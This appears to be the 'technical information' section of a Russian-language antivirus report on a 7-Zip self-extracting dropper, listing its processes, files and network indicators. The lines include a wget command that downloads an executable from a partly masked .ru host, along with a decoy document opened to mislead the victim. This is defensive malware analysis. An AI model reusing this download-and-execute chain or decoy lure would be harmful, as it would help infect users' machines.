Техническая информация
- '%TEMP%\7ZipSfx.000\WINDOWRD23.EXE'
- '%TEMP%\7ZipSfx.000\wget.exe' "http://dk#####grafmoskva.ru/share42/WINDOWRD23.EXE"
- '%TEMP%\7ZipSfx.000\WINDOWRD23.EXE' (загружен из сети Интернет)
- '<SYSTEM32>\rundll32.exe' <SYSTEM32>\shell32.dll,OpenAs_RunDLL %TEMP%\7ZipSfx.000\Document_Presentation_x30565423.docx
- '<SYSTEM32>\cmd.exe' /c ""%TEMP%\7ZipSfx.000\notepad.cmd" "
- %TEMP%\7ZipSfx.000\wget.exe
- %TEMP%\7ZipSfx.000\WINDOWRD23.EXE
- %TEMP%\7ZipSfx.000\Document_Presentation_x30565423.docx
- %TEMP%\7ZipSfx.000\notepad.cmd
- %TEMP%\7ZipSfx.000\wget.exe
- %TEMP%\7ZipSfx.000\WINDOWRD23.EXE
- %TEMP%\7ZipSfx.000\Document_Presentation_x30565423.docx
- %TEMP%\7ZipSfx.000\notepad.cmd
- 'dk#####grafmoskva.ru':80
- dk#####grafmoskva.ru/share42/WINDOWRD23.EXE
- DNS ASK dk#####grafmoskva.ru
- ClassName: 'Shell_TrayWnd' WindowName: ''